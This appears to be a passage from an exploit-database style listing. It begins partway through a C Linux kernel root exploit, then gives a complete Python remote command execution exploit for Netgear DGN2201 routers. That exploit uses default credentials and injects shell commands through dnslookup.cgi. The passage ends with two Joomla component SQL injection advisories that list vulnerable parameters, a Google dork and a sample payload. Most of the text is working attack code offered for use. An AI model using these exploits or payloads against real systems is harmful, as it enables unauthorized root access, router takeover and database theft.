if (!write_file(“/proc/self/setgroups”, “deny”)) {
perror(“write_file(/proc/self/set_groups)”);
exit(EXIT_FAILURE);
}
if (!write_file(“/proc/self/uid_map”, “0 %d 1\n”, real_uid)){
perror(“write_file(/proc/self/uid_map)”);
exit(EXIT_FAILURE);
}
if (!write_file(“/proc/self/gid_map”, “0 %d 1\n”, real_gid)) {
perror(“write_file(/proc/self/gid_map)”);
exit(EXIT_FAILURE);
}

cpu_set_t my_set;
CPU_ZERO(&my_set);
CPU_SET(0, &my_set);
if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
perror(“sched_setaffinity()”);
exit(EXIT_FAILURE);
}

if (system(“/sbin/ifconfig lo up”) != 0) {
perror(“system(/sbin/ifconfig lo up)”);
exit(EXIT_FAILURE);
}

printf(“[.] namespace sandbox setup successfully\n”);
}

int main() {
setup_sandbox();

#if SMEP_SMAP_BYPASS
disable_smep_smap();
#endif

get_root();

check_root();

while (true) {
sleep(100);
}

return 0;
}

Netgear DGN2201 v1/v2/v3/v4 dnslookup.cgi Remote Command Execution

#!/usr/bin/python

#Provides access to default user account, privileges can be easily elevated by using either:
# – a kernel exploit (ex. memodipper was tested and it worked)
# – by executing /bin/bd (suid backdoor present on SOME but not all versions)
# – by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)

#Pozdrawiam: Kornela, Komara i Sknerusa

import sys
import requests

#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to

login = ‘admin’
password = ‘password’

def main():
if len(sys.argv) < 2:
print “./netgearpwn_2.py
return
spawnShell()

def execute(cmd): #Escaping basic sanitization
requests.post(“http://” + sys.argv[1] + “/dnslookup.cgi”, data={‘host_name’:”www.google.com; ” + cmd, ‘lookup’: “Lookup”}, auth=(login, password))
return

def spawnShell():
print “Dropping a shell-like environment (blind OS injection)”
print “To test it type ‘reboot'”
while True:
cmd = raw_input(“[blind $] “)
execute(cmd)

if __name__ == “__main__”:
main()

#2017-02-25 by SivertPL
#Tak, to ja.

Joomla Gnosis 1.1.2 SQL Injection

# # # # # 
# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_gnosis
# Date: 25.02.2017
# Vendor Homepage: http://hypermodern.org/
# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/
# Demo: http://gnosis.hypermodern.org/index.php/dictionary
# Version: 1.1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL]
# # # # #

Joomla My MSG 3.2.1 SQL Injection

# # # # # 
# Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection
# Google Dork: N/A
# Date: 25.02.2017
# Vendor Homepage: https://www.cmsplugin.com/
# Software : https://www.cmsplugin.com/products/components/10-my-msg
# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg
# Version: 3.2.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL]
# http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL]
# '+order+by+10-- -
# Etc...
# # # # #